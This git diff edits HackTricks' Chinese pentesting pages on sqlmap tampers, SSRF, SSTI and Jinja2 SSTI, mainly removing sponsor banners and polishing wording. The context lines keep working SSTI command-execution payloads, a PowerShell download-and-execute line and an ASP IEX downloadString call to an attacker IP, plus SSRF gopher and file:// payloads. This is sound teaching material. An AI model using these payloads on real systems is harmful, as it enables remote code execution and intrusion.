-| symboliclogical.py           | 用其符号对应物(&& 和)替换 AND 和 OR 逻辑运算符                                                                                   |
+| symboliclogical.py           | 用其符号对应物 (&& 和) 替换 AND 和 OR 逻辑运算符                                                                                   |
 | unionalltounion.py           | 用 UNION SELECT 替换 UNION ALL SELECT                                                                                              |
 | unmagicquotes.py             | 用多字节组合 %bf%27 替换引号字符 ('),并在末尾添加通用注释(以使其工作)                                                          |
 | uppercase.py                 | 用大写值 'INSERT' 替换每个关键字字符                                                                                              |
@@ -194,12 +187,5 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | versionedmorekeywords.py     | 用版本化的 MySQL 注释包裹每个关键字                                                                                                 |
 | xforwardedfor.py             | 附加假 HTTP 头 'X-Forwarded-For'                                                                                                   |
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们 20 多个自定义工具来映射攻击面,查找让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index 907c04260..f09e47430 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -1,13 +1,5 @@
 # SSRF (Server Side Request Forgery)
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
-
 {{#include ../../banners/hacktricks-training.md}}
 
 ## 基本信息
@@ -26,7 +18,7 @@
 - [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)
 - [http://requestrepo.com/](http://requestrepo.com/)
 - [https://github.com/stolenusername/cowitness](https://github.com/stolenusername/cowitness)
-- [https://github.com/dwisiswant0/ngocok](https://github.com/dwisiswant0/ngocok) - 使用 ngrok 的 Burp Collaborator
+- [https://github.com/dwisiswant0/ngocok](https://github.com/dwisiswant0/ngocok) - 一个使用 ngrok 的 Burp Collaborator
 
 ## 白名单域名绕过
 
@@ -39,20 +31,20 @@ url-format-bypass.md
 ### 通过开放重定向绕过
 
 如果服务器得到了正确的保护,您可以 **通过利用网页中的开放重定向来绕过所有限制**。因为网页将允许 **SSRF 到同一域**,并且可能会 **跟随重定向**,您可以利用 **开放重定向使服务器访问内部任何资源**。\
-在这里阅读更多: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
+在这里阅读更多信息: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
 
 ## 协议
 
 - **file://**
 - URL 方案 `file://` 被引用,直接指向 `/etc/passwd`: `file:///etc/passwd`
 - **dict://**
-- DICT URL 方案被描述为用于通过 DICT 协议访问定义或单词列表。给出的一个示例说明了一个构造的 URL,针对特定单词、数据库和条目编号,以及一个 PHP 脚本可能被滥用以使用攻击者提供的凭据连接到 DICT 服务器的实例: `dict://;@:/d:::`
+- DICT URL 方案被描述为用于通过 DICT 协议访问定义或单词列表。给出的一个示例说明了一个构造的 URL,针对特定单词、数据库和条目编号,以及一个 PHP 脚本可能被滥用以使用攻击者提供的凭据连接到 DICT 服务器的实例: `dict://;@:/d:::`
 - **SFTP://**
-- 被识别为通过安全外壳进行安全文件传输的协议,提供了一个示例,展示了如何利用 PHP 脚本连接到恶意 SFTP 服务器: `url=sftp://generic.com:11111/`
+- 被识别为通过安全外壳进行安全文件传输的协议,提供了一个示例,展示了如何利用 PHP 脚本连接到恶意 SFTP 服务器: `url=sftp://generic.com:11111/`
 - **TFTP://**
-- 提到简单文件传输协议,操作在 UDP 上,提供了一个 PHP 脚本的示例,旨在向 TFTP 服务器发送请求。向 'generic.com' 的端口 '12346' 发送 TFTP 请求以获取文件 'TESTUDPPACKET': `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
+- 提到简单文件传输协议,操作在 UDP 上,提供了一个设计用于向 TFTP 服务器发送请求的 PHP 脚本示例。向 'generic.com' 的端口 '12346' 发送 TFTP 请求以获取文件 'TESTUDPPACKET': `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
 - **LDAP://**
-- 本节涵盖轻量级目录访问协议,强调其用于管理和访问通过 IP 网络分布的目录信息服务。在本地主机上与 LDAP 服务器交互: `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
+- 本节涵盖轻量级目录访问协议,强调其在 IP 网络上管理和访问分布式目录信息服务的用途。通过 ssrf.php 与本地主机上的 LDAP 服务器交互: `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
 - **SMTP**
 - 描述了一种利用 SSRF 漏洞与本地主机上的 SMTP 服务交互的方法,包括揭示内部域名的步骤以及基于该信息的进一步调查行动。
 ```
@@ -63,7 +55,7 @@ From https://twitter.com/har1sec/status/1182255952055164929
 4. connect
 ```
 - **Curl URL globbing - WAF 绕过**
-- 如果 SSRF 是通过 **curl** 执行的,curl 有一个叫做 [**URL globbing**](https://everything.curl.dev/cmdline/globbing) 的功能,这可能对绕过 WAF 有用。例如,在这个 [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi) 中,你可以找到一个关于 **通过 `file` 协议的路径遍历** 的示例:
+- 如果 SSRF 是通过 **curl** 执行的,curl 有一个叫做 [**URL globbing**](https://everything.curl.dev/cmdline/globbing) 的功能,这可能对绕过 WAF 有用。例如,在这个 [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi) 中,你可以找到一个关于 **通过 `file` 协议进行路径遍历** 的示例:
 ```
 file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
 ```
@@ -72,8 +64,8 @@ file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
 
 ### Gopher://
 
-使用此协议,您可以指定服务器要**发送**的**IP、端口和字节**。然后,您基本上可以利用SSRF来**与任何TCP服务器通信**(但您需要先知道如何与该服务对话)。\
-幸运的是,您可以使用[Gopherus](https://github.com/tarunkant/Gopherus)为多个服务创建有效载荷。此外,[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)可用于为_Java RMI_服务创建_gopher_有效载荷。
+使用此协议,您可以指定服务器要**发送**的**IP、端口和字节**。然后,您基本上可以利用SSRF与**任何TCP服务器**进行**通信**(但您需要先知道如何与该服务对话)。\
+幸运的是,您可以使用[Gopherus](https://github.com/tarunkant/Gopherus)为多个服务创建有效载荷。此外,[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)可以用于为_Java RMI_服务创建_gopher_有效载荷。
 
 **Gopher smtp**
 ```
@@ -114,7 +106,7 @@ curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
 ```
 ## SSRF通过引荐头和其他方式
 
-服务器上的分析软件通常会记录引荐头以跟踪传入链接,这种做法无意中使应用程序暴露于服务器端请求伪造(SSRF)漏洞。这是因为此类软件可能会访问引荐头中提到的外部URL,以分析引用网站内容。为了发现这些漏洞,建议使用Burp Suite插件“**Collaborator Everywhere**”,利用分析工具处理Referer头的方式来识别潜在的SSRF攻击面。
+服务器上的分析软件通常会记录引荐头以跟踪传入链接,这种做法无意中使应用程序暴露于服务器端请求伪造(SSRF)漏洞。这是因为此类软件可能会访问引荐头中提到的外部URL,以分析引用网站的内容。为了发现这些漏洞,建议使用Burp Suite插件“**Collaborator Everywhere**”,利用分析工具处理Referer头的方式来识别潜在的SSRF攻击面。
 
 ## SSRF通过证书中的SNI数据
 
@@ -129,7 +121,7 @@ ssl_preread on;
 }
 }
 ```
-在此配置中,服务器名称指示(SNI)字段中的值被直接用作后端地址。此设置暴露了服务器端请求伪造(SSRF)漏洞,可以通过在SNI字段中仅指定所需的IP地址或域名来利用。以下是一个利用示例,使用`openssl`命令强制连接到任意后端,例如`internal.host.com`:
+在此配置中,服务器名称指示(SNI)字段中的值被直接用作后端地址。此设置暴露了服务器端请求伪造(SSRF)漏洞,可以通过在SNI字段中仅指定所需的IP地址或域名来利用。以下是一个利用示例,强制连接到任意后端,例如 `internal.host.com`,使用 `openssl` 命令如下:
 ```bash
 openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 ```
@@ -141,11 +133,11 @@ openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 
 ## PDFs 渲染
 
-如果网页自动创建一个包含您提供的一些信息的 PDF,您可以 **插入一些将由 PDF 创建者**(服务器)在创建 PDF 时执行的 JS,您将能够利用 SSRF。 [**在这里找到更多信息**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
+如果网页自动创建一个包含您提供的一些信息的 PDF,您可以 **插入一些 JS,这些 JS 将在创建 PDF 时由 PDF 创建者(服务器)执行**,您将能够利用 SSRF。[**在这里找到更多信息**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
 
 ## 从 SSRF 到 DoS
 
-创建多个会话并尝试通过会话利用 SSRF 下载大文件。
+创建多个会话并尝试利用会话中的 SSRF 下载大型文件。
 
 ## SSRF PHP 函数
 
@@ -187,17 +179,9 @@ return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%4
 if __name__ == "__main__":
 app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
 ```
-

+## 错误配置的代理到 SSRF
 
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
-
-## 配置错误的代理导致 SSRF
-
-来自 [**这篇文章的技巧**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
+技巧 [**来自这篇文章**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
 
 ### Flask
 
@@ -234,7 +218,7 @@ Connection: close
 
 

 
-发现请求的**路径**可以以字符**`;`**开头,这允许使用**`@`**并注入一个新主机以进行访问。攻击请求:
+发现请求的**路径**可以以字符**`;`**开头,这允许使用**`@`**并注入一个新主机进行访问。攻击请求:
 ```http
 GET ;@evil.com/url HTTP/1.1
 Host: target.com
@@ -279,7 +263,7 @@ Connection: close
 
 [**`Singularity of Origin`**](https://github.com/nccgroup/singularity) 是一个执行 [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) 攻击的工具。它包含了将攻击服务器的 DNS 名称的 IP 地址重新绑定到目标机器的 IP 地址所需的组件,并向目标机器提供攻击有效载荷以利用易受攻击的软件。
 
-还可以查看 **公共运行的服务器** [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)
+还可以查看 **公共运行服务器** [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)
 
 ## DNS Rebidding + TLS 会话 ID/会话票证
 
@@ -367,11 +351,3 @@ SSRF Proxy 是一个多线程 HTTP 代理服务器,旨在通过易受服务器
 - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index cb05361a7..3d1797422 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -2,17 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

+## 什么是 SSTI (服务器端模板注入)
 
-[**RootedCON**](https://www.rootedcon.com) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。这个大会的 **使命是促进技术知识**,是各个学科的技术和网络安全专业人士的一个热烈交流点。
+服务器端模板注入是一种漏洞,当攻击者能够将恶意代码注入到在服务器上执行的模板中时,就会发生这种漏洞。此漏洞可以在各种技术中找到,包括 Jinja。
 
-{% embed url="https://www.rootedcon.com/" %}
-
-## 什么是 SSTI (Server-Side Template Injection)
-
-服务器端模板注入是一种漏洞,当攻击者能够将恶意代码注入到在服务器上执行的模板时,就会发生这种漏洞。此漏洞可以在多种技术中找到,包括 Jinja。
-
-Jinja 是一个在 web 应用程序中使用的流行模板引擎。让我们考虑一个使用 Jinja 的脆弱代码片段的示例:
+Jinja 是一种在 web 应用程序中使用的流行模板引擎。让我们考虑一个示例,演示使用 Jinja 的易受攻击的代码片段:
 ```python
 output = template.render(name=request.args.get('name'))
 ```
@@ -22,7 +16,7 @@ output = template.render(name=request.args.get('name'))
 ```
 http://vulnerable-website.com/?name={{bad-stuff-here}}
 ```
-有效载荷 `{{bad-stuff-here}}` 被注入到 `name` 参数中。该有效载荷可以包含 Jinja 模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,从而可能控制服务器。
+有效载荷 `{{bad-stuff-here}}` 被注入到 `name` 参数中。此有效载荷可以包含 Jinja 模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,从而可能控制服务器。
 
 为了防止服务器端模板注入漏洞,开发人员应确保在将用户输入插入模板之前,正确地对其进行清理和验证。实施输入验证和使用上下文感知的转义技术可以帮助减轻此漏洞的风险。
 
@@ -31,7 +25,7 @@ http://vulnerable-website.com/?name={{bad-stuff-here}}
 要检测服务器端模板注入 (SSTI),最初,**模糊测试模板** 是一种简单的方法。这涉及将一系列特殊字符 (**`${{<%[%'"}}%\`**) 注入模板,并分析服务器对常规数据与此特殊有效载荷的响应差异。漏洞指示包括:
 
 - 抛出的错误,揭示漏洞并可能暴露模板引擎。
-- 反射中缺少有效载荷,或部分缺失,暗示服务器以不同于常规数据的方式处理它。
+- 反射中缺少有效载荷或部分缺失,暗示服务器以不同于常规数据的方式处理它。
 - **明文上下文**:通过检查服务器是否评估模板表达式(例如 `{{7*7}}`,`${7*7}`)来区分 XSS。
 - **代码上下文**:通过更改输入参数确认漏洞。例如,改变 `http://vulnerable-website.com/?greeting=data.username` 中的 `greeting`,以查看服务器的输出是动态的还是固定的,例如 `greeting=data.username}}hello` 返回用户名。
 
@@ -116,7 +110,7 @@ ${"freemarker.template.utility.Execute"?new()("id")}
 
 ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
 ```
-**Freemarker - 沙箱绕过**
+**Freemarker - 沙盒绕过**
 
 ⚠️ 仅适用于 2.3.30 版本以下的 Freemarker
 ```java
@@ -175,11 +169,11 @@ ${T(java.lang.Runtime).getRuntime().exec('calc')}
 ${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}
 ```
 
-Thymeleaf 要求这些表达式放置在特定属性中。然而,_表达式内联_ 对于其他模板位置是支持的,使用语法如 `[[...]]` 或 `[(...)]`。因此,一个简单的 SSTI 测试有效负载可能看起来像 `[[${7*7}]]`。
+Thymeleaf 要求这些表达式放置在特定属性中。然而,_表达式内联_ 对其他模板位置是支持的,使用语法如 `[[...]]` 或 `[(...)]`。因此,一个简单的 SSTI 测试有效载荷可能看起来像 `[[${7*7}]]`。
 
-然而,这个有效负载成功的可能性通常较低。Thymeleaf 的默认配置不支持动态模板生成;模板必须是预定义的。开发人员需要实现自己的 `TemplateResolver` 以动态从字符串创建模板,这并不常见。
+然而,这个有效载荷成功的可能性通常较低。Thymeleaf 的默认配置不支持动态模板生成;模板必须是预定义的。开发人员需要实现自己的 `TemplateResolver` 以动态创建字符串模板,这并不常见。
 
-Thymeleaf 还提供了 _表达式预处理_,其中双下划线 (`__...__`) 内的表达式会被预处理。这个特性可以在构建表达式时使用,如 Thymeleaf 文档中所示:
+Thymeleaf 还提供 _表达式预处理_,其中双下划线 (`__...__`) 内的表达式会被预处理。这个特性可以在构建表达式时使用,如 Thymeleaf 文档中所示:
 ```java
 #{selection.__${sel.code}__}
 ```
@@ -203,7 +197,7 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 el-expression-language.md
 {{#endref}}
 
-### Spring Framework (Java)
+### Spring 框架 (Java)
 ```java
 *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
 ```
@@ -381,8 +375,8 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
 表达式语言 (EL) 是一个基本特性,促进了 JavaEE 中表现层(如网页)与应用逻辑(如托管 bean)之间的交互。它在多个 JavaEE 技术中被广泛使用,以简化这种通信。利用 EL 的关键 JavaEE 技术包括:
 
 - **JavaServer Faces (JSF)**:使用 EL 将 JSF 页面中的组件绑定到相应的后端数据和操作。
-- **JavaServer Pages (JSP)**:EL 在 JSP 中用于访问和操作 JSP 页面中的数据,使得连接页面元素与应用数据变得更加容易。
-- **Java EE 的上下文和依赖注入 (CDI)**:EL 与 CDI 集成,允许 web 层与托管 bean 之间的无缝交互,确保更连贯的应用结构。
+- **JavaServer Pages (JSP)**:EL 在 JSP 中用于访问和操作 JSP 页面中的数据,使得将页面元素连接到应用数据变得更容易。
+- **Java EE 的上下文和依赖注入 (CDI)**:EL 与 CDI 集成,允许 web 层与托管 bean 之间无缝交互,确保更连贯的应用结构。
 
 查看以下页面以了解更多关于 **EL 解释器的利用**:
 
@@ -423,11 +417,7 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 
 - 更多信息请访问 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
-

 
-​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台。
-
-{% embed url="https://www.rootedcon.com/" %}
 
 ##
 
@@ -618,7 +608,7 @@ echo $t->finish($t->parse('OUT', 'authors'));
 ```
 **更多信息**
 
-- 在 Jade 部分的 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Jade 部分
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
 
 ### patTemplate (PHP)
@@ -789,7 +779,7 @@ range.constructor(
 
 ### Python
 
-查看以下页面以了解关于 **绕过沙箱的任意命令执行** 的技巧:
+查看以下页面以了解关于 **任意命令执行绕过沙箱** 的技巧:
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@@ -913,14 +903,14 @@ ${x}
 - `@() <= 成功`
 - `@("{{code}}") <= 成功`
 - `@ <= 成功`
-- `@{} <= 错误!`
-- `@{ <= 错误!`
+- `@{} <= 错误!`
+- `@{ <= 错误!`
 - `@(1+2)`
 - `@( //C#代码 )`
 - `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
 - `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
 
-.NET `System.Diagnostics.Process.Start` 方法可以用来在服务器上启动任何进程,从而创建 webshell。你可以在 [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp) 找到一个易受攻击的 webapp 示例。
+.NET `System.Diagnostics.Process.Start` 方法可以用来在服务器上启动任何进程,从而创建 webshell。您可以在 [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp) 找到一个易受攻击的 webapp 示例。
 
 **更多信息**
 
@@ -931,7 +921,7 @@ ${x}
 
 - `<%= 7*7 %>` = 49
 - `<%= "foo" %>` = foo
-- `<%= foo %>` = 无
+- `<%= foo %>` = Nothing
 - `<%= response.write(date()) %>` = \
 ```xml
 <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
@@ -1014,10 +1004,4 @@ return string(out)
 - [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
 - [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
 
-

-
-​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的一个热烈交流点。
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
index 284ce43f3..e6d31f5cb 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
@@ -2,13 +2,8 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

 
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
-
-## **实验室**
+## **实验**
 ```python
 from flask import Flask, request, render_template_string
 
@@ -28,7 +23,7 @@ app.run()
 
 ### **调试语句**
 
-如果启用了调试扩展,将会有一个 `debug` 标签可用于转储当前上下文以及可用的过滤器和测试。这对于查看在模板中可以使用的内容而无需设置调试器非常有用。
+如果启用了调试扩展,将可以使用 `debug` 标签来转储当前上下文以及可用的过滤器和测试。这对于查看在模板中可以使用的内容而无需设置调试器非常有用。
 ```python
 
 
@@ -69,8 +64,8 @@ app.run()
 
 ### 访问全局对象
 
-例如,在代码 `render_template("hello.html", username=username, email=email)` 中,对象 username 和 email **来自非沙箱的 Python 环境**,并且在 **沙箱环境** 内是 **可访问的**。\
-此外,还有其他对象将 **始终可以从沙箱环境访问**,这些对象包括:
+例如,在代码 `render_template("hello.html", username=username, email=email)` 中,对象 username 和 email **来自非沙箱的 Python 环境**,并且在 **沙箱环境** 中是 **可访问的**。\
+此外,还有其他对象将 **始终可以从沙箱环境访问**,这些对象是:
 ```
 []
 ''
@@ -133,7 +128,7 @@ dict.__mro__[-1]
 
 **恢复了** `` 并调用了 `__subclasses__`,我们现在可以使用这些类来读取和写入文件以及执行代码。
 
-对 `__subclasses__` 的调用给了我们机会 **访问数百个新函数**,我们只需访问 **文件类** 来 **读取/写入文件** 或任何可以访问 **允许执行命令** 的类(如 `os`)。
+对 `__subclasses__` 的调用给了我们机会 **访问数百个新函数**,我们将仅通过访问 **文件类** 来 **读取/写入文件** 或任何可以访问 **允许执行命令** 的类(如 `os`)。
 
 **读取/写入远程文件**
 ```python
@@ -209,7 +204,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
 ```
 - [**返回这里以获取更多访问全局对象的选项**](jinja2-ssti.md#accessing-global-objects)
 - [**返回这里以获取更多访问对象类的选项**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
-- [**阅读此内容以在没有对象类的情况下获取RCE**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
+- [**阅读此内容以在没有对象类的情况下获得RCE**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
 
 **避免HTML编码**
 
@@ -250,12 +245,12 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
 
 
 ```
-## Jinja 注入而不使用 **\**
+## Jinja 注入没有 **\**
 
 从 [**全局对象**](jinja2-ssti.md#accessing-global-objects) 有另一种方法可以到达 **RCE 而不使用该类。**\
 如果你设法从这些全局对象中获取到任何 **函数**,你将能够访问 **`__globals__.__builtins__`**,从那里 **RCE** 是非常 **简单** 的。
 
-你可以通过以下方式从对象 **`request`**、**`config`** 和任何 **其他** 有访问权限的 **全局对象** 中 **找到函数**:
+你可以通过以下方式从 **`request`**、**`config`** 和任何 **其他** 有趣的 **全局对象** 中 **找到函数**:
 ```bash
 {{ request.__class__.__dict__ }}
 - application
@@ -324,7 +319,7 @@ crack-request: Read a request file for attack
 Read the request in the file, PAYLOADreplace it with the actual payload and submit it
 The request will be urlencoded by default according to the HTTP format, which can be --urlencode-payload 0turned off.
 ```
-## 参考文献
+## 参考
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
 - 查看 [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index 165f19ce0..c38743ea3 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -2,144 +2,128 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
-在每次Web Pentest中,有**几个隐藏和明显的地方可能存在漏洞**。这篇文章旨在作为一个检查清单,以确认您是否在所有可能的地方搜索了漏洞。
+在每次 Web Pentest 中,有 **几个隐藏和明显的地方可能存在漏洞**。这篇文章旨在作为一个检查清单,以确认您已在所有可能的地方搜索漏洞。
 
 ## Proxies
 
 > [!NOTE]
-> 现在**网络** **应用程序**通常**使用**某种类型的**中介** **代理**,这些代理可能被(滥)用来利用漏洞。这些漏洞需要一个脆弱的代理存在,但通常还需要后端的某些额外漏洞。
+> 现在的 **web** **应用程序** 通常 **使用** 某种 **中介** **代理**,这些代理可能被(滥)用来利用漏洞。这些漏洞需要一个脆弱的代理存在,但通常还需要后端的某些额外漏洞。
 
-- [ ] [**滥用逐跳头**](abusing-hop-by-hop-headers.md)
-- [ ] [**缓存中毒/缓存欺骗**](cache-deception/)
-- [ ] [**HTTP请求走私**](http-request-smuggling/)
-- [ ] [**H2C走私**](h2c-smuggling.md)
-- [ ] [**服务器端包含/边缘端包含**](server-side-inclusion-edge-side-inclusion-injection.md)
-- [ ] [**揭露Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
-- [ ] [**XSLT服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
-- [ ] [**代理/WAF保护绕过**](proxy-waf-protections-bypass.md)
+- [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
+- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
+- [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
+- [ ] [**H2C Smuggling**](h2c-smuggling.md)
+- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
+- [ ] [**Uncovering Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
+- [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
+- [ ] [**Proxy / WAF Protections Bypass**](proxy-waf-protections-bypass.md)
 
-## **用户输入**
+## **User input**
 
 > [!NOTE]
-> 大多数网络应用程序将**允许用户输入一些稍后将被处理的数据。**\
-> 根据服务器期望的数据结构,某些漏洞可能适用,也可能不适用。
+> 大多数 web 应用程序将 **允许用户输入一些数据以便后续处理。**\
+> 根据服务器期望的数据结构,某些漏洞可能适用或不适用。
 
-### **反射值**
+### **Reflected Values**
 
 如果输入的数据可能以某种方式反映在响应中,则页面可能会受到多种问题的影响。
 
-- [ ] [**客户端模板注入**](client-side-template-injection-csti.md)
-- [ ] [**命令注入**](command-injection.md)
+- [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)
+- [ ] [**Command Injection**](command-injection.md)
 - [ ] [**CRLF**](crlf-0d-0a.md)
